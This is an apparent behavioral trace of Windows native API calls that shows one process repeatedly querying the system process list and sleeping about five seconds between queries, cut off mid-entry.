[0161.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.316] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.331] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.339] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.360] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.370] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.433] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.448] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.478] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.497] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.512] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.526] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.545] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.557] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.590] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.607] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.620] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.638] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.653] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.668] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.685] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.698] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.714] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 